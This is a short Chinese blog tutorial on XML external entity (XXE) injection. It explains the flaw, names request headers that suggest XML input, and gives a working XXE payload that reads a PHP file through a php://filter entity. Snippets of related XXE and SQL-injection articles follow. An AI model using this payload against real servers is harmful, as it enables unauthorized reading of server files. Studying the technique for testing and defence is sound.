XXE漏洞----xml

最新推荐文章于 2024-07-20 18:29:33 发布
最新推荐文章于 2024-07-20 18:29:33 发布
阅读量184 收藏
点赞数
分类专栏: 笔记 文章标签: xml php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45649612/article/details/117589431
版权

一、简述

XXE漏洞全称(XML External Entity Injection)即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载(上面说了实体加载有两种方式),导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。

二、漏洞paylaod应用

抓包请求头中有可能存在该漏洞

Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest

主要用于读取本地文件

<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY payload SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/flag.php">
]>
<user>
<username>&payload;</username><password>mo</password>
</user>

在外部的形式

<!ENTITY 实体名称 SYSTEM "url">

说明:DOCTYPE为指定元素的根元素
ENTITY之后的实体名称url在后面的&中回显
文件url常用php伪协议读取表示

G-holder
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
PHP环境 XML外部实体注入漏洞XXE
m0_46580995的博客
07-19 780
PHP环境 XML外部实体注入漏洞XXE) 简介: PHP 7.0.30 libxml 2.8.0 复现环境vulhub exec进入docker 有三个文件 dom.php 使用DOMDocument解析body SimpleXMLElement.php 使用SimpleXMLElement类解析body simplexml_load_string.php 使用simplexml_load_string函数解析body 相应代码如下 root@e1ccaae36891:/var/www/html#
XXE漏洞
迷风小白
07-12 2799
0X00 什么是XXE XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 0X01 XML XML文档结构包括XML声明、DTD文档类型定义和文档元素信息 ...
Web漏洞分析-SQL注入&XXE注入(中下)
qq_61861243的博客
12-05 219
在这个信息互联的时代,保护我们的Web应用免受SQL注入和XXE注入等威胁是至关重要的。①、现在大多数的网站对于SQL注入都做了一定的防御,使用Mysql中转义的函数如addslashes,mysql_real_escape_string,mysql_escape_string等,还有配置magic_quote_gpc,不过PHP高版本已经移除此功能。利用MySQL的一种特性,GBK是多字节编码,两个字节就代表一个汉字,在%df加入的时候会和转义符\,即%5c进行结合,变成了一个“運”,而“逃逸了出来。
什么是XXE漏洞XXE漏洞的原理
weixin_47112073的博客
10-25 481
因为最近做的靶机关于XXE漏洞,这里简单写一下什么是XXE漏洞,自己理解的东西,一来方便自己经常回顾,二来对还没有接触过XXE漏洞的朋友来说也比较友好
php xml文件解析失败,PHP解析xml文件错误
weixin_35930794的博客
03-11 292
我正在尝试使用simpleXML从http://rates.fxcm.com/RatesXML获取数据使用simplexml_load_file()我有时会遇到错误,因为这个网站在xml文件之前和之后总是有奇怪的字符串/数字.例:20001.275951.27621.277481.27385-123:29:110然后我决定使用file_get_contents并将其解析为带有simplexml_l...
Invalid XML Error
图纸的博客
06-15 1561
问题描述:我用layer弹窗加载某页面,然后页面加载时发送一个ajax请求获取数据并且用innerHtml加载XML时,一直出现此毛病,并且直接跳转到该加载界面是没问题的(不用弹出层) 解决办法:换成普通的GET,post请求,好像是说layer用ajax会出现毛病 ...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞的利用方法,特别是任意...
XXE - 防御策略-01
09-15
XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 从 2018 年...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件读取、命令执行、甚至服务器控制等恶意行为。 在本节课程中,我们将讨论XXE漏洞的利用方法,特别是任意文件读取的实现。...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
105-web漏洞挖掘之XXE漏洞1
08-03
挖掘XXE漏洞的关键在于识别那些处理XML输入的代码点,尤其是涉及XML解析器的部分。以下是一些通用策略: 1. 检查所有接受XML输入的API或接口,寻找可能触发XML解析的代码。 2. 分析服务端如何处理XML数据,特别是...
[Vulhub] PHP环境 XML外部实体注入漏洞XXE
weixin_45605352的博客
05-07 3350
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行、
Web安全之XXE漏洞_x-requested-with xmlhttprequest,2024年最新带你一起探究网络安全事件分发机制
2401_84184638的博客
04-10 874
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
反爬:请求头中加X-Requested-With,才能请求到数据
热门推荐
数据知道的博客
02-29 3万+
请求头中加X-Requested-With,才能请求到数据 如网站:http://view.jfinfo.com/research/ydjc import re import requests from lxml import etree """ 网站:http://view.jfinfo.com/research/ydjc 请求头中加X-Requested-With,才能请求到数据 """ h...
Web安全之XXE漏洞_x-requested-with xmlhttprequest,网络安全性能优化之启动优化实战篇
jixuczy的博客
04-15 596
/包括数据包中的数据可能是如下的这种形式,都可以进行一个判断。//文件类型为 XML。//请求头含有XML。
『PHP代码审计』飓风CMS1.10存在SQL注入漏洞
Ho1aAs‘s Blog
06-11 513
文章目录前言一、漏洞演示二、漏洞分析三、利用四、修复五、总结完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 其他管理——TAG专题,点击提交添加tag 抓包 POST /x/admin/ajax.php?xhash=599b40fe938db62cf441b4dc7d2fa3e7 HTTP/1.1 Host: testcms.com Content-Length: 169 Accept: application/json, text/java
HTTP之X-Requested-With分析和思考
maiyude的专栏
03-31 2390
本文主要是针对自己在实际的协议分析过程中遇到的X-Requested-With头域进行了分析,主要分析了该头域为什么会出现,以及在什么情况下出现。好像是同一个问题,但是细究还是有所不同。 最近在报文抓包的时候遇到了X-Requested-With头域,该头域在RFC2616中并未提及,以X打头的头域作为非HTTP标准协议,一般是某种技术的出现而产生或者某个组织指定的,像我遇到的X-Reque...
配置文件格式 XML 快速上手
最新发布
Dablelv 的博客专栏。
07-20 833
XML(Extensible Markup Language)是可扩展标记语言,用来传输和存储数据。因为其允许用户自定义标记名称,具有自我描述性,可灵活地用于存储服务配置信息。
泛微oa e-cology xxe 漏洞
08-17
泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值